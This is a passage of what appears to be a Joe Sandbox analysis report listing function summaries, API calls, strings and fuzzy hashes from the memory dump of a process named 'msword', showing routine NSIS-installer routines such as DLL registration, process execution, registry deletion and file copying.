Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0000E400,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024478760.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024709098.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_400000_msword.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000010.00000002.2024435618.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000010.00000002.2024407494.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.2024456376.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
